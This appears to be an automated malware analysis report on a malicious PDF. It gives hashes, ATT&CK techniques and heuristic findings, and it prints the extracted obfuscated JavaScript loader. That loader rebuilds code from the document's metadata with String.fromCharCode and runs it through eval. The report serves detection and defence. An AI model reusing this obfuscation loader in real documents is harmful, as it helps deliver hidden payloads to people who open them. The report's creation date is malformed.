PDF malware analysis — malicious · 869dd0e03e2ae931

MALICIOUS

PDF

17.8 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode First seen: 2013-07-12

MD5: 3f6a13171a46173cd35ad3761df45758 SHA-1: 23124ce9feb568d8b25b9a5066071fb246825ed5 SHA-256: 869dd0e03e2ae931a0b65a224548c10769009eeccec3dd2c43bbb19cc063efb1

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that utilizes String.fromCharCode to construct and execute code. This script is designed to download and run a secondary payload, indicated by the critical PDF_JS_EXPLOIT_CLUSTER heuristic. The obfuscated nature of the script and the use of String.fromCharCode suggest an attempt to evade detection. The primary attack vector is likely spearphishing attachment.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
/Producer (String.fromCharCode)
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x450B 348 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x450B	348 bytes
SHA-256: `bb1cddb12aff2a7fc0037672788a1ab1af2f707183a0a634098c3891ecb15e9b`
Preview script First 1,000 lines of the extracted script var w = 4; var mdzuw = this.title.replace(/w/g,'*w,'); mdzuw = mdzuw.replace(/t/g,'2'); mdzuw=mdzuw.substr(0,mdzuw.length-2) + ']'; xfx=function(){return this}(); dwrgm=xfx[this.subject]; cfz=dwrgm(this.producer); ugxlo = dwrgm(mdzuw); var s = ''; for (i = 0; i < ugxlo.length; i++) { qcul = ugxlo[i]; s += cfz(qcul); } dwrgm(s);

SHA-256: bb1cddb12aff2a7fc0037672788a1ab1af2f707183a0a634098c3891ecb15e9b

Preview script

First 1,000 lines of the extracted script

var w = 4;
var mdzuw = this.title.replace(/w/g,'*w,');
mdzuw = mdzuw.replace(/t/g,'2');
mdzuw=mdzuw.substr(0,mdzuw.length-2) + ']';
xfx=function(){return this}();
dwrgm=xfx[this.subject];
cfz=dwrgm(this.producer);
ugxlo = dwrgm(mdzuw);
var s = '';
for (i = 0; i < ugxlo.length; i++) {
	qcul = ugxlo[i];
	s += cfz(qcul);
}
dwrgm(s);

Open this report in the interactive analyzer, or submit your own file for analysis.